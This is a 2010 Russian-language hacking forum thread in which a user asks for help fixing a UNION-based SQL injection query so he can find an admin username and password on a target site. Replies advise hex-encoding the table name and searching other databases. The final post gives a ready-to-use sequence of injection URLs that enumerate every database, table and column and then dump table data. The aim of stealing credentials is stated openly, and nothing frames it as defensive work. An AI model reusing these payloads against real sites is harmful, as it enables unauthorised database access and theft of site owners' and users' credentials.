Помогите составить правильный запрос

Discussion in 'Болталка' started by br1tva, 15 Apr 2010.

  1. br1tva

    br1tva Elder - Старейшина

    Joined:
    26 Dec 2007
    Messages:
    23
    Likes Received:
    8
    Reputations:
    -5
    Когда составляю запрос UNION+SELECT+1,2,column_name+from+information_schema.columns+limit+1,1-- то мне выводятся колонки первого столбца , когда составляю запрос а виде - UNION+SELECT+1,2,column_name+from+information_schema.columns+where+table_name='isearch_admin_log'-- начинает ругаться и нефига не выводит ... Помогите составить правильный запрос .
     
  2. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    478
    Likes Received:
    483
    Reputations:
    99
    Название таблицы захекси
     
  3. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3
    Попробуй так.
     
  4. br1tva

    br1tva Elder - Старейшина

    Joined:
    26 Dec 2007
    Messages:
    23
    Likes Received:
    8
    Reputations:
    -5
    на одном сайте может быть 2 базы данных ?? В одной дапустим новости , коменты и прочая фигня , а во второй базе пароли админа ?? )
    Перебрал всю information_schemu Усернайма и пароля от админки нигде нету .... Ктонить с таким сталкивался????
     
  5. aka_zver

    aka_zver Elder - Старейшина

    Joined:
    17 Sep 2009
    Messages:
    471
    Likes Received:
    330
    Reputations:
    73
    да
    да
    сталкивался, просматривай остальные БД
     
  6. br1tva

    br1tva Elder - Старейшина

    Joined:
    26 Dec 2007
    Messages:
    23
    Likes Received:
    8
    Reputations:
    -5
    Надо было сразу спросить : Как посмотреть какие базы висят на сайте и как просмотреть другую базу .

    Разобрался , спасибо )
     
    #6 br1tva, 15 Apr 2010
    Last edited: 15 Apr 2010
  7. aka_zver

    aka_zver Elder - Старейшина

    Joined:
    17 Sep 2009
    Messages:
    471
    Likes Received:
    330
    Reputations:
    73
    Пример:

    Все БД:
    http://www.site.com/index.php?id=-1+union+select+group_concat(0x0b,schema_name)+from+information_schema.schemata--+

    Таблицы из нужной БД:
    http://www.site.com/index.php?id=-1+union+select+group_concat(0x0b,table_name)+from+information_schema.tables+where+table_schema='имя_бд'--+

    Колонки из нужной таблицы из нужной БД:
    http://www.site.com/index.php?id=-1+union+select+group_concat(0x0b,column_name)+from+information_schema.columns+where+table_name='имя_таблицы'+and+table_schema='имя_бд'--+

    Данные из нужной таблицы из нужной БД:
    http://www.site.com/index.php?id=-1+union+select+group_concat(имя_колонки)+from+имя_бд.имя_таблицы--+

    З.Ы. а чё тема в болталке-то ? :confused: